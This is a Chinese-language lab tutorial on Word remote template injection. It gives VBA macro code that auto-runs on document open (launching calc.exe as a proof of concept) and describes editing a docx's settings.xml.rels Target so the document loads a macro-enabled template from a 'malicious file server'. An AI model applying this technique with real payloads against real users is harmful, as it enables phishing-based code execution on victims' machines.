环境说明
| IP | HOSTNAME | NOTE |
|---|
172.16.103.21 | Win10 | 受害机 |
10.10.10.85 | CentOS7 | 恶意文件服务器 |
相关脚本
| 内容 | 下载 |
|---|
powershell、docx、dotm文件 | 点击下载 |
原理
word模板注入是利用Word文档加载附加模板时的缺陷,加载的模板是带宏的恶意模板,从而间接执行宏代码。模板注入分为远程和本地模板,远程通过http协议加载模板,本地可以通过file协议加载,实战中大部分都是远程加载。
远程模板注入
先创建一个启用宏的dotm文件

Private Sub StartCalculator_open()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "calc.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
Private Sub Document_open()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
Program = "calc.exe"
TaskID = Shell(Program, 1)
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
将宏文档部署到web服务器上

创建一个docx文件远程调用宏文档
- 创建一个
docx文件,选用一个word的模板,然后将docx用压缩工具打开并修改./word/_rels/settings.xml.rels文件的Target地址


- 打开修改后的
docx文件,就会远程加载启用了宏的文件然后弹出计算器


参考链接:
1.https://zerokeeper.com/web-security/office-document-attack-surface.html